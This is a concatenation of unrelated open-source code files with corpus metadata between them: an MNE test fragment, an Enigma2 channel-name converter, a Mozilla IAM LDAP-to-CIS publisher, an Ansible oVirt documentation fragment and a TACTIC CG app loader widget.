epochs = EpochsArray(data, info, events)
pick_dict.update({key: True})
picks = pick_types(epochs.info, **pick_dict)
del pick_dict[key]
assert_equal(len(picks), n_channels)
def test_default_values():
"""Test default event_id, tmax tmin values are working correctly"""
raw, events = _get_data()[:2]
epoch_1 = Epochs(raw, events[:1], preload=True)
epoch_2 = Epochs(raw, events[:1], tmin=-0.2, tmax=0.5, preload=True)
assert_equal(hash(epoch_1), hash(epoch_2))
run_tests_if_main()
| bsd-3-clause | 8,410,499,245,579,183,000 | 42.322122 | 79 | 0.604802 | false |
MOA-2011/enigma2.pli4.0 | lib/python/Components/Converter/ServiceName2.py | 1 | 23033 | # -*- coding: utf-8 -*-
#
# Extended ServiceName Converter for Enigma2 Dreamboxes (ServiceName2.py)
# Coded by vlamo (c) 2011
#
# Version: 0.4 (03.06.2011 18:40)
# Version: 0.5 (08.09.2012) add Alternative numbering mode support - Dmitry73 & 2boom
# Version: 0.6 (19.10.2012) add stream mapping
# Version: 0.7 (19.09.2013) add iptv info - nikolasi & 2boom
# Version: 0.8 (29.10.2013) add correct output channelnumner - Dmitry73
# Version: 0.9 (18.11.2013) code fix and optimization - Taapat & nikolasi
# Version: 1.0 (04.12.2013) code fix and optimization - Dmitry73
# Version: 1.1 (06-17.12.2013) small cosmetic fix - 2boom
# Version: 1.2 (25.12.2013) small iptv fix - MegAndretH
# Version: 1.3 (27.01.2014) small iptv fix - 2boom
# Version: 1.4 (30.06.2014) fix iptv reference - 2boom
# Version: 1.5 (04.07.2014) fix iptv reference cosmetic - 2boom
# Support: http://dream.altmaster.net/ & http://gisclub.tv
#
from Components.Converter.Converter import Converter
from enigma import iServiceInformation, iPlayableService, iPlayableServicePtr, eServiceReference, eServiceCenter, eTimer, getBestPlayableServiceReference
from Components.Element import cached
from Components.config import config
import NavigationInstance
try:
from Components.Renderer.ChannelNumber import ChannelNumberClasses
correctChannelNumber = True
except:
correctChannelNumber = False
class ServiceName2(Converter, object):
NAME = 0
NUMBER = 1
BOUQUET = 2
PROVIDER = 3
REFERENCE = 4
ORBPOS = 5
TPRDATA = 6
SATELLITE = 7
ALLREF = 8
FORMAT = 9
def __init__(self, type):
Converter.__init__(self, type)
if type == "Name" or not len(str(type)):
self.type = self.NAME
elif type == "Number":
self.type = self.NUMBER
elif type == "Bouquet":
self.type = self.BOUQUET
elif type == "Provider":
self.type = self.PROVIDER
elif type == "Reference":
self.type = self.REFERENCE
elif type == "OrbitalPos":
self.type = self.ORBPOS
elif type == "TpansponderInfo":
self.type = self.TPRDATA
elif type == "Satellite":
self.type = self.SATELLITE
elif type == "AllRef":
self.type = self.ALLREF
else:
self.type = self.FORMAT
self.sfmt = type[:]
try:
if (self.type == 1 or (self.type == 9 and '%n' in self.sfmt)) and correctChannelNumber:
ChannelNumberClasses.append(self.forceChanged)
except:
pass
self.refstr = self.isStream = self.ref = self.info = self.what = self.tpdata = None
self.Timer = eTimer()
self.Timer.callback.append(self.neededChange)
self.IPTVcontrol = self.isAdditionalService(type=0)
self.AlternativeControl = self.isAdditionalService(type=1)
def isAdditionalService(self, type=0):
def searchService(serviceHandler, bouquet):
istype = False
servicelist = serviceHandler.list(bouquet)
if not servicelist is None:
while True:
s = servicelist.getNext()
if not s.valid(): break
if not (s.flags & (eServiceReference.isMarker|eServiceReference.isDirectory)):
if type:
if s.flags & eServiceReference.isGroup:
istype = True
return istype
else:
if "%3a//" in s.toString().lower():
istype = True
return istype
return istype
isService = False
serviceHandler = eServiceCenter.getInstance()
if not config.usage.multibouquet.value:
service_types_tv = '1:7:1:0:0:0:0:0:0:0:(type == 1) || (type == 17) || (type == 22) || (type == 25) || (type == 134) || (type == 195)'
rootstr = '%s FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet'%(service_types_tv)
else:
rootstr = '1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "bouquets.tv" ORDER BY bouquet'
bouquet = eServiceReference(rootstr)
if not config.usage.multibouquet.value:
isService = searchService(serviceHandler, bouquet)
else:
bouquetlist = serviceHandler.list(bouquet)
if not bouquetlist is None:
while True:
bouquet = bouquetlist.getNext()
if not bouquet.valid(): break
if bouquet.flags & eServiceReference.isDirectory:
isService = searchService(serviceHandler, bouquet)
if isService: break
return isService
def getServiceNumber(self, ref):
def searchHelper(serviceHandler, num, bouquet):
servicelist = serviceHandler.list(bouquet)
if not servicelist is None:
while True:
s = servicelist.getNext()
if not s.valid(): break
if not (s.flags & (eServiceReference.isMarker|eServiceReference.isDirectory)):
num += 1
if s == ref: return s, num
return None, num
if isinstance(ref, eServiceReference):
isRadioService = ref.getData(0) in (2,10)
lastpath = isRadioService and config.radio.lastroot.value or config.tv.lastroot.value
if 'FROM BOUQUET' not in lastpath:
if 'FROM PROVIDERS' in lastpath:
return 'P', 'Provider'
if 'FROM SATELLITES' in lastpath:
return 'S', 'Satellites'
if ') ORDER BY name' in lastpath:
return 'A', 'All Services'
return 0, 'N/A'
try:
acount = config.plugins.NumberZapExt.enable.value and config.plugins.NumberZapExt.acount.value or config.usage.alternative_number_mode.value
except:
acount = False
rootstr = ''
for x in lastpath.split(';'):
if x != '': rootstr = x
serviceHandler = eServiceCenter.getInstance()
if acount is True or not config.usage.multibouquet.value:
bouquet = eServiceReference(rootstr)
service, number = searchHelper(serviceHandler, 0, bouquet)
else:
if isRadioService:
bqrootstr = '1:7:2:0:0:0:0:0:0:0:FROM BOUQUET "bouquets.radio" ORDER BY bouquet'
else:
bqrootstr = '1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "bouquets.tv" ORDER BY bouquet'
number = 0
cur = eServiceReference(rootstr)
bouquet = eServiceReference(bqrootstr)
bouquetlist = serviceHandler.list(bouquet)
if not bouquetlist is None:
while True:
bouquet = bouquetlist.getNext()
if not bouquet.valid(): break
if bouquet.flags & eServiceReference.isDirectory:
service, number = searchHelper(serviceHandler, number, bouquet)
if not service is None and cur == bouquet: break
if not service is None:
info = serviceHandler.info(bouquet)
name = info and info.getName(bouquet) or ''
return number, name
return 0, ''
def getProviderName(self, ref):
if isinstance(ref, eServiceReference):
from Screens.ChannelSelection import service_types_radio, service_types_tv
typestr = ref.getData(0) in (2,10) and service_types_radio or service_types_tv
pos = typestr.rfind(':')
rootstr = '%s (channelID == %08x%04x%04x) && %s FROM PROVIDERS ORDER BY name' %(typestr[:pos+1],ref.getUnsignedData(4),ref.getUnsignedData(2),ref.getUnsignedData(3),typestr[pos+1:])
provider_root = eServiceReference(rootstr)
serviceHandler = eServiceCenter.getInstance()
providerlist = serviceHandler.list(provider_root)
if not providerlist is None:
while True:
provider = providerlist.getNext()
if not provider.valid(): break
if provider.flags & eServiceReference.isDirectory:
servicelist = serviceHandler.list(provider)
if not servicelist is None:
while True:
service = servicelist.getNext()
if not service.valid(): break
if service == ref:
info = serviceHandler.info(provider)
return info and info.getName(provider) or "Unknown"
return ""
def getTransponderInfo(self, info, ref, fmt):
result = ""
if self.tpdata is None:
if ref:
self.tpdata = ref and info.getInfoObject(ref, iServiceInformation.sTransponderData)
else:
self.tpdata = info.getInfoObject(iServiceInformation.sTransponderData)
if not isinstance(self.tpdata, dict):
self.tpdata = None
return result
if self.isStream:
type = 'IP-TV'
else:
type = self.tpdata.get('tuner_type', '')
if not fmt or fmt == 'T':
if type == 'DVB-C':
fmt = ["t ","F ","Y ","i ","f ","M"] #(type frequency symbol_rate inversion fec modulation)
elif type == 'DVB-T':
if ref:
fmt = ["O ","F ","h ","m ","g ","c"] #(orbital_position code_rate_hp transmission_mode guard_interval constellation)
else:
fmt = ["t ","F ","h ","m ","g ","c"] #(type frequency code_rate_hp transmission_mode guard_interval constellation)
elif type == 'IP-TV':
return _("Streaming")
else:
fmt = ["O ","F","p ","Y ","f"] #(orbital_position frequency polarization symbol_rate fec)
for line in fmt:
f = line[:1]
if f == 't': # %t - tuner_type (dvb-s/s2/c/t)
if type == 'DVB-S':
result += _("Satellite")
elif type == 'DVB-C':
result += _("Cable")
elif type == 'DVB-T':
result += _("Terrestrial")
elif type == 'IP-TV':
result += _('Stream-tv')
else:
result += 'N/A'
elif f == 's': # %s - system (dvb-s/s2/c/t)
if type == 'DVB-S':
x = self.tpdata.get('system', 0)
result += x in range(2) and {0:'DVB-S',1:'DVB-S2'}[x] or ''
else:
result += type
elif f == 'F': # %F - frequency (dvb-s/s2/c/t) in KHz
if type in ('DVB-S','DVB-C','DVB-T'):
result += '%d'%(self.tpdata.get('frequency', 0) / 1000)
elif f == 'f': # %f - fec_inner (dvb-s/s2/c/t)
if type in ('DVB-S','DVB-C'):
x = self.tpdata.get('fec_inner', 15)
result += x in range(10)+[15] and {0:'Auto',1:'1/2',2:'2/3',3:'3/4',4:'5/6',5:'7/8',6:'8/9',7:'3/5',8:'4/5',9:'9/10',15:'None'}[x] or ''
elif type == 'DVB-T':
x = self.tpdata.get('code_rate_lp', 5)
result += x in range(6) and {0:'1/2',1:'2/3',2:'3/4',3:'5/6',4:'7/8',5:'Auto'}[x] or ''
elif f == 'i': # %i - inversion (dvb-s/s2/c/t)
if type in ('DVB-S','DVB-C','DVB-T'):
x = self.tpdata.get('inversion', 2)
result += x in range(3) and {0:'On',1:'Off',2:'Auto'}[x] or ''
elif f == 'O': # %O - orbital_position (dvb-s/s2)
if type == 'DVB-S':
x = self.tpdata.get('orbital_position', 0)
result += x > 1800 and "%d.%d°W"%((3600-x)/10, (3600-x)%10) or "%d.%d°E"%(x/10, x%10)
elif type == 'DVB-T':
result += 'DVB-T'
elif type == 'DVB-C':
result += 'DVB-C'
elif type == 'Iptv':
result += 'Stream'
elif f == 'M': # %M - modulation (dvb-s/s2/c)
x = self.tpdata.get('modulation', 1)
if type == 'DVB-S':
result += x in range(4) and {0:'Auto',1:'QPSK',2:'8PSK',3:'QAM16'}[x] or ''
elif type == 'DVB-C':
result += x in range(6) and {0:'Auto',1:'QAM16',2:'QAM32',3:'QAM64',4:'QAM128',5:'QAM256'}[x] or ''
elif f == 'p': # %p - polarization (dvb-s/s2)
if type == 'DVB-S':
x = self.tpdata.get('polarization', 0)
result += x in range(4) and {0:'H',1:'V',2:'L',3:'R'}[x] or '?'
elif f == 'Y': # %Y - symbol_rate (dvb-s/s2/c)
if type in ('DVB-S','DVB-C'):
result += '%d'%(self.tpdata.get('symbol_rate', 0) / 1000)
elif f == 'r': # %r - rolloff (dvb-s2)
if not self.isStream:
x = self.tpdata.get('rolloff')
if not x is None:
result += x in range(3) and {0:'0.35',1:'0.25',2:'0.20'}[x] or ''
elif f == 'o': # %o - pilot (dvb-s2)
if not self.isStream:
x = self.tpdata.get('pilot')
if not x is None:
result += x in range(3) and {0:'Off',1:'On',2:'Auto'}[x] or ''
elif f == 'c': # %c - constellation (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('constellation', 3)
result += x in range(4) and {0:'QPSK',1:'QAM16',2:'QAM64',3:'Auto'}[x] or ''
elif f == 'l': # %l - code_rate_lp (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('code_rate_lp', 5)
result += x in range(6) and {0:'1/2',1:'2/3',2:'3/4',3:'5/6',4:'7/8',5:'Auto'}[x] or ''
elif f == 'h': # %h - code_rate_hp (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('code_rate_hp', 5)
result += x in range(6) and {0:'1/2',1:'2/3',2:'3/4',3:'5/6',4:'7/8',5:'Auto'}[x] or ''
elif f == 'm': # %m - transmission_mode (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('transmission_mode', 2)
result += x in range(3) and {0:'2k',1:'8k',2:'Auto'}[x] or ''
elif f == 'g': # %g - guard_interval (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('guard_interval', 4)
result += x in range(5) and {0:'1/32',1:'1/16',2:'1/8',3:'1/4',4:'Auto'}[x] or ''
elif f == 'b': # %b - bandwidth (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('bandwidth', 1)
result += x in range(4) and {0:'8 MHz',1:'7 MHz',2:'6 MHz',3:'Auto'}[x] or ''
elif f == 'e': # %e - hierarchy_information (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('hierarchy_information', 4)
result += x in range(5) and {0:'None',1:'1',2:'2',3:'4',4:'Auto'}[x] or ''
result += line[1:]
return result
def getSatelliteName(self, ref):
if isinstance(ref, eServiceReference):
orbpos = ref.getUnsignedData(4) >> 16
if orbpos == 0xFFFF: #Cable
return _("Cable")
elif orbpos == 0xEEEE: #Terrestrial
return _("Terrestrial")
else: #Satellite
orbpos = ref.getData(4) >> 16
if orbpos < 0: orbpos += 3600
try:
from Components.NimManager import nimmanager
return str(nimmanager.getSatDescription(orbpos))
except:
dir = ref.flags & (eServiceReference.isDirectory|eServiceReference.isMarker)
if not dir:
refString = ref.toString().lower()
if refString.startswith("-1"):
return ''
elif refString.startswith("1:134:"):
return _("Alternative")
elif refString.startswith("4097:"):
return _("Internet")
else:
return orbpos > 1800 and "%d.%d°W"%((3600-orbpos)/10, (3600-orbpos)%10) or "%d.%d°E"%(orbpos/10, orbpos%10)
return ""
def getIPTVProvider(self, refstr):
if 'tvshka' in refstr:
return "SCHURA"
elif 'udp/239.0.1' in refstr:
return "Lanet"
elif '3a7777' in refstr:
return "IPTVNTV"
elif 'KartinaTV' in refstr:
return "KartinaTV"
elif 'Megaimpuls' in refstr:
return "MEGAIMPULSTV"
elif 'Newrus' in refstr:
return "NEWRUSTV"
elif 'Sovok' in refstr:
return "SOVOKTV"
elif 'Rodnoe' in refstr:
return "RODNOETV"
elif '238.1.1.89%3a1234' in refstr:
return "TRK UKRAINE"
elif '238.1.1.181%3a1234' in refstr:
return "VIASAT"
elif 'cdnet' in refstr:
return "NonameTV"
elif 'unicast' in refstr:
return "StarLink"
elif 'udp/239.255.2.' in refstr:
return "Planeta"
elif 'udp/233.7.70.' in refstr:
return "Rostelecom"
elif 'udp/239.1.1.' in refstr:
return "Real"
elif 'udp/238.0.' in refstr or 'udp/233.191.' in refstr:
return "Triolan"
elif '%3a8208' in refstr:
return "MovieStar"
elif 'udp/239.0.0.' in refstr:
return "Trinity"
elif '.cn.ru' in refstr or 'novotelecom' in refstr:
return "Novotelecom"
elif 'www.youtube.com' in refstr:
return "www.youtube.com"
elif '.torrent-tv.ru' in refstr:
return "torrent-tv.ru"
elif '//91.201.' in refstr:
return "www.livehd.tv"
elif 'web.tvbox.md' in refstr:
return "web.tvbox.md"
elif 'live-p12' in refstr:
return "PAC12"
elif '4097' in refstr:
return "StreamTV"
elif '%3a1234' in refstr:
return "IPTV1"
return ""
def getPlayingref(self, ref):
playingref = None
if NavigationInstance.instance:
playingref = NavigationInstance.instance.getCurrentlyPlayingServiceReference()
if not playingref:
playingref = eServiceReference()
return playingref
def resolveAlternate(self, ref):
nref = getBestPlayableServiceReference(ref, self.getPlayingref(ref))
if not nref:
nref = getBestPlayableServiceReference(ref, eServiceReference(), True)
return nref
def getReferenceType(self, refstr, ref):
if ref is None:
if NavigationInstance.instance:
playref = NavigationInstance.instance.getCurrentlyPlayingServiceReference()
if playref:
refstr = playref.toString() or ''
prefix = ''
if refstr.startswith("4097:"):
prefix += "GStreamer "
if '%3a//' in refstr:
sref = ' '.join(refstr.split(':')[10:])
refstr = prefix + sref
else:
sref = ':'.join(refstr.split(':')[:10])
refstr = prefix + sref
else:
if refstr != '':
prefix = ''
if refstr.startswith("1:7:"):
if 'FROM BOUQUET' in refstr:
prefix += "Bouquet "
elif '(provider == ' in refstr:
prefix += "Provider "
elif '(satellitePosition == ' in refstr:
prefix += "Satellit "
elif '(channelID == ' in refstr:
prefix += "Current tr "
elif refstr.startswith("1:134:"):
prefix += "Alter "
elif refstr.startswith("1:64:"):
prefix += "Marker "
elif refstr.startswith("4097:"):
prefix += "GStreamer "
if self.isStream:
if self.refstr:
if '%3a//' in self.refstr:
sref = ' '.join(self.refstr.split(':')[10:])
else:
sref = ':'.join(self.refstr.split(':')[:10])
else:
sref = ' '.join(refstr.split(':')[10:])
return prefix + sref
else:
if self.refstr:
sref = ':'.join(self.refstr.split(':')[:10])
else:
sref = ':'.join(refstr.split(':')[:10])
return prefix + sref
return refstr
@cached
def getText(self):
service = self.source.service
if isinstance(service, iPlayableServicePtr):
info = service and service.info()
ref = None
else: # reference
info = service and self.source.info
ref = service
if not info: return ""
if ref:
refstr = ref.toString()
else:
refstr = info.getInfoString(iServiceInformation.sServiceref)
if refstr is None:
refstr = ''
if self.AlternativeControl:
if ref and refstr.startswith("1:134:") and self.ref is None:
nref = self.resolveAlternate(ref)
if nref:
self.ref = nref
self.info = eServiceCenter.getInstance().info(self.ref)
self.refstr = self.ref.toString()
if not self.info: return ""
if self.IPTVcontrol:
if '%3a//' in refstr or (self.refstr and '%3a//' in self.refstr) or refstr.startswith("4097:"):
self.isStream = True
if self.type == self.NAME:
name = ref and (info.getName(ref) or 'N/A') or (info.getName() or 'N/A')
prefix = ''
if self.ref:
prefix = " (alter)"
name += prefix
return name.replace('\xc2\x86', '').replace('\xc2\x87', '')
elif self.type == self.NUMBER:
try:
service = self.source.serviceref
num = service and service.getChannelNum() or None
except:
num = None
if num:
return str(num)
else:
num, bouq = self.getServiceNumber(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
return num and str(num) or ''
elif self.type == self.BOUQUET:
num, bouq = self.getServiceNumber(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
return bouq
elif self.type == self.PROVIDER:
if self.isStream:
if self.refstr and ('%3a//' in self.refstr or '%3a//' in self.refstr):
return self.getIPTVProvider(self.refstr)
return self.getIPTVProvider(refstr)
else:
if self.ref:
return self.getProviderName(self.ref)
if ref:
return self.getProviderName(ref)
else:
return info.getInfoString(iServiceInformation.sProvider) or ''
elif self.type == self.REFERENCE:
if self.refstr:
return self.refstr
return refstr
elif self.type == self.ORBPOS:
if self.isStream:
return "Stream"
else:
if self.ref and self.info:
return self.getTransponderInfo(self.info, self.ref, 'O')
return self.getTransponderInfo(info, ref, 'O')
elif self.type == self.TPRDATA:
if self.isStream:
return _("Streaming")
else:
if self.ref and self.info:
return self.getTransponderInfo(self.info, self.ref, 'T')
return self.getTransponderInfo(info, ref, 'T')
elif self.type == self.SATELLITE:
if self.isStream:
return _("Internet")
else:
if self.ref:
return self.getSatelliteName(self.ref)
#test#
return self.getSatelliteName(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
elif self.type == self.ALLREF:
tmpref = self.getReferenceType(refstr, ref)
if 'Bouquet' in tmpref or 'Satellit' in tmpref or 'Provider' in tmpref:
return ' '
elif '%3a' in tmpref:
return ':'.join(refstr.split(':')[:10])
return tmpref
elif self.type == self.FORMAT:
num = bouq = ''
tmp = self.sfmt[:].split("%")
if tmp:
ret = tmp[0]
tmp.remove(ret)
else:
return ""
for line in tmp:
f = line[:1]
if f == 'N': # %N - Name
name = ref and (info.getName(ref) or 'N/A') or (info.getName() or 'N/A')
postfix = ''
if self.ref:
postfix = " (alter)"
name += postfix
ret += name.replace('\xc2\x86', '').replace('\xc2\x87', '')
elif f == 'n': # %n - Number
try:
service = self.source.serviceref
num = service and service.getChannelNum() or None
except:
num = None
if num:
ret += str(num)
else:
num, bouq = self.getServiceNumber(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
ret += num and str(num) or ''
elif f == 'B': # %B - Bouquet
num, bouq = self.getServiceNumber(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
ret += bouq
elif f == 'P': # %P - Provider
if self.isStream:
if self.refstr and '%3a//' in self.refstr:
ret += self.getIPTVProvider(self.refstr)
else:
ret += self.getIPTVProvider(refstr)
else:
if self.ref:
ret += self.getProviderName(self.ref)
else:
if ref:
ret += self.getProviderName(ref)
else:
ret += info.getInfoString(iServiceInformation.sProvider) or ''
elif f == 'R': # %R - Reference
if self.refstr:
ret += self.refstr
else:
ret += refstr
elif f == 'S': # %S - Satellite
if self.isStream:
ret += _("Internet")
else:
if self.ref:
ret += self.getSatelliteName(self.ref)
else:
ret += self.getSatelliteName(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
elif f == 'A': # %A - AllRef
tmpref = self.getReferenceType(refstr, ref)
if 'Bouquet' in tmpref or 'Satellit' in tmpref or 'Provider' in tmpref:
ret += ' '
elif '%3a' in tmpref:
ret += ':'.join(refstr.split(':')[:10])
else:
ret += tmpref
elif f in 'TtsFfiOMpYroclhmgbe':
if self.ref:
ret += self.getTransponderInfo(self.info, self.ref, f)
else:
ret += self.getTransponderInfo(info, ref, f)
ret += line[1:]
return '%s'%(ret.replace('N/A', '').strip())
text = property(getText)
def neededChange(self):
if self.what:
Converter.changed(self, self.what)
self.what = None
def forceChanged(self, what):
if what == True:
self.refstr = self.isStream = self.ref = self.info = self.tpdata = None
Converter.changed(self, (self.CHANGED_ALL,))
self.what = None
def changed(self, what):
if what[0] != self.CHANGED_SPECIFIC or what[1] in (iPlayableService.evStart,):
self.refstr = self.isStream = self.ref = self.info = self.tpdata = None
if self.type in (self.NUMBER,self.BOUQUET) or \
(self.type == self.FORMAT and ('%n' in self.sfmt or '%B' in self.sfmt)):
self.what = what
self.Timer.start(200, True)
else:
Converter.changed(self, what)
| gpl-2.0 | -7,542,504,310,261,494,000 | 34.158779 | 184 | 0.62747 | false |
mozilla-iam/cis | python-modules/cis_publisher/cis_publisher/ldap.py | 1 | 2591 | import cis_profile
import cis_publisher
import boto3
import botocore
import logging
import lzma
import json
from traceback import format_exc
logger = logging.getLogger(__name__)
class LDAPPublisher:
def __init__(self):
self.secret_manager = cis_publisher.secret.Manager()
def publish(self, user_ids=None):
"""
Glue to create or fetch cis_profile.User profiles for this publisher
Then pass everything over to the Publisher class
None, ALL profiles are sent.
@user_ids: list of str - user ids to publish. If None, all users are published.
"""
logger.info("Starting LDAP Publisher")
profiles_xz = self.fetch_from_s3()
# If there are memory issues here, use lzma.LZMADecompressor() instead
raw = lzma.decompress(profiles_xz)
profiles_json = json.loads(raw)
# Free some memory
del profiles_xz
del raw
profiles = []
logger.info("Processing {} profiles".format(len(profiles_json)))
for p in profiles_json:
str_p = json.dumps(profiles_json[p])
if (user_ids is None) or (profiles_json[p]["user_id"]["value"] in user_ids):
profiles.append(cis_profile.User(user_structure_json=str_p))
logger.info("Will publish {} profiles".format(len(profiles)))
publisher = cis_publisher.Publish(profiles, publisher_name="ldap", login_method="ad")
failures = []
try:
publisher.filter_known_cis_users()
failures = publisher.post_all(user_ids=user_ids)
except Exception as e:
logger.error("Failed to post_all() LDAP profiles. Trace: {}".format(format_exc()))
raise e
if len(failures) > 0:
logger.error("Failed to post {} profiles: {}".format(len(failures), failures))
def fetch_from_s3(self):
"""
Fetches xz json data from S3 (ie ldap_blah.json.xz)
Returns the xz bytestream
"""
bucket = self.secret_manager.secret("bucket")
bucket_key = self.secret_manager.secret("bucket_key")
logger.info("Retrieving all LDAP profiles from S3 {}/{}".format(bucket, bucket_key))
s3 = boto3.client("s3")
data = None
try:
response = s3.get_object(Bucket=bucket, Key=bucket_key)
data = response["Body"].read()
except botocore.exceptions.ClientError as e:
logger.error("Failed to get LDAP S3 file from {}/{} trace: {}".format(bucket, bucket_key, format_exc()))
raise e
return data
| mpl-2.0 | 6,481,470,480,269,489,000 | 36.014286 | 116 | 0.612891 | false |
KohlsTechnology/ansible | lib/ansible/utils/module_docs_fragments/ovirt_facts.py | 7 | 3242 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
class ModuleDocFragment(object):
# facts standard oVirt documentation fragment
DOCUMENTATION = '''
options:
fetch_nested:
description:
- "If I(True) the module will fetch additional data from the API."
- "It will fetch IDs of the VMs disks, snapshots, etc. User can configure to fetch other
attributes of the nested entities by specifying C(nested_attributes)."
version_added: "2.3"
nested_attributes:
description:
- "Specifies list of the attributes which should be fetched from the API."
- "This parameter apply only when C(fetch_nested) is I(true)."
version_added: "2.3"
auth:
required: True
description:
- "Dictionary with values needed to create HTTP/HTTPS connection to oVirt:"
- C(username)[I(required)] - The name of the user, something like I(admin@internal).
Default value is set by I(OVIRT_USERNAME) environment variable.
- "C(password)[I(required)] - The password of the user. Default value is set by I(OVIRT_PASSWORD) environment variable."
- "C(url)[I(required)] - A string containing the base URL of the server, usually
something like `I(https://server.example.com/ovirt-engine/api)`. Default value is set by I(OVIRT_URL) environment variable."
- "C(token) - Token to be used instead of login with username/password. Default value is set by I(OVIRT_TOKEN) environment variable."
- "C(insecure) - A boolean flag that indicates if the server TLS
certificate and host name should be checked."
- "C(ca_file) - A PEM file containing the trusted CA certificates. The
certificate presented by the server will be verified using these CA
certificates. If `C(ca_file)` parameter is not set, system wide
CA certificate store is used. Default value is set by I(OVIRT_CAFILE) environment variable."
- "C(kerberos) - A boolean flag indicating if Kerberos authentication
should be used instead of the default basic authentication."
- "C(headers) - Dictionary of HTTP headers to be added to each API call."
requirements:
- python >= 2.7
- ovirt-engine-sdk-python >= 4.2.4
notes:
- "In order to use this module you have to install oVirt Python SDK.
To ensure it's installed with correct version you can create the following task:
pip: name=ovirt-engine-sdk-python version=4.2.4"
'''
| gpl-3.0 | 1,827,179,313,049,713,400 | 49.65625 | 145 | 0.676743 | false |
sadanandb/pmt | src/tactic/ui/cgapp/loader_wdg.py | 6 | 6041 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['CGAppLoaderWdg','IntrospectWdg']
from pyasm.common import Xml, Container
from pyasm.web import Widget, DivWdg, HtmlElement, SpanWdg, WebContainer, Table
from pyasm.widget import SelectWdg, FilterSelectWdg, WidgetConfig, HiddenWdg, IconWdg
from tactic.ui.common import BaseRefreshWdg
from tactic.ui.widget import ActionButtonWdg
#from connection_select_wdg import ConnectionSelectWdg
class CGAppLoaderWdg(BaseRefreshWdg):
'''Main loader class for CG apps'''
def get_args_keys(my):
'''external settings which populate the widget'''
return {
'view': 'view that this widget is making use of',
'search_type': 'search type',
'load_options_class': 'custom load options class name',
'load_script': 'custom load script',
'load_script_path': 'custom load script path',
}
def init(my):
my.view = my.kwargs.get('view')
my.search_type = my.kwargs.get('search_type')
my.load_options_class = my.kwargs.get('load_options_class')
my.load_script = my.kwargs.get('load_script')
my.load_script_path = my.kwargs.get('load_script_path')
my.state = Container.get_full_dict("global_state")
def get_display(my):
# specially made for "load" view
if not my.view.endswith("load"):
return DivWdg()
widget = Widget()
# first use
filter_top = DivWdg(css="maq_search_bar")
filter_top.add_color("background", "background2", -15)
# so dg_table.search_cbk will obtain values from this widget
filter_top.add_class('spt_table_search')
filter_top.add_style("padding: 3px")
# this is used by get_process() in LoaderWdg
filter_top.add(HiddenWdg('prefix', 'view_action_option'))
for name, value in my.kwargs.items():
filter_top.set_attr("spt_%s" % name, value)
from tactic.ui.cgapp import SObjectLoadWdg, LoaderButtonWdg, LoaderElementWdg, IntrospectWdg
# this contains the process filter and load options
sobject_load = SObjectLoadWdg(search_type=my.search_type, load_options_class = my.load_options_class)
filter_top.add(sobject_load)
# set the process
#class foo:
# def get_value(my):
# return "texture"
#Container.put("process_filter", foo())
filter_top.add( HtmlElement.br() )
table = Table()
table.add_class('spt_action_wdg')
table.set_max_width()
td = table.add_cell()
# create the loader button
button = LoaderButtonWdg()
# -------------
# test an event mechanism
event_name = '%s|load_snapshot' % my.search_type
#event_name = 'load_snapshot'
# get triggers with this event
from pyasm.search import Search
search = Search("config/client_trigger")
search.add_filter("event", event_name)
triggers = search.get_sobjects()
if triggers:
for trigger in triggers:
#callback = trigger.get_value("custom_script_code")
callback = trigger.get_value("callback")
event_script = '''
spt.app_busy.show("Loading ...", "Loading selected [%s] in to session");
var script = spt.CustomProject.get_script_by_path("%s");
bvr['script'] = script;
spt.CustomProject.exec_custom_script(evt, bvr);
spt.app_busy.hide();
''' % (my.search_type, callback)
loader_script = '''spt.named_events.fire_event('%s', {})''' % event_name
table.add_behavior( {
'type': 'listen',
'event_name': event_name,
'cbjs_action': event_script
} )
# test a passed in script path
elif my.load_script_path:
# an event is called
event_name = 'load_snapshot'
event_script = '''var script = spt.CustomProject.get_script_by_path("%s");spt.CustomProject.exec_script(script)''' % my.load+script_path
loader_script = '''spt.named_events.fire_event('%s', {})''' % event_name
table.add_behavior( {
'type': 'listen',
'event_name': event_name,
'cbjs_action': event_script
} )
# end test
# ---------------
elif my.load_script:
loader_script = my.load_script
else:
loader_script = LoaderElementWdg.get_load_script(my.search_type)
#print LoaderElementWdg.get_load_script(my.search_type)
# add the introspect button
introspect_button = IntrospectWdg()
introspect_button.add_style('float: left')
introspect_button.add_style('margin-bottom: 6px')
td.add(introspect_button)
# to be attached
smart_menu = LoaderElementWdg.get_smart_menu(my.search_type)
button.set_load_script(loader_script)
button.set_smart_menu(smart_menu)
td.add(button)
td.add_style('text-align','right')
td.add_style('padding-right', '40px')
widget.add(filter_top)
widget.add( HtmlElement.br() )
widget.add(table)
return widget
class IntrospectWdg(ActionButtonWdg):
'''a widget that does introspection to analyze/update what
assets(versions) are loaded in the session of the app'''
def __init__(my):
super(IntrospectWdg, my).__init__(title='Introspect', tip='Introspect the current session')
my.add_behavior({'type': "click", 'cbjs_action': "introspect(bvr)"})
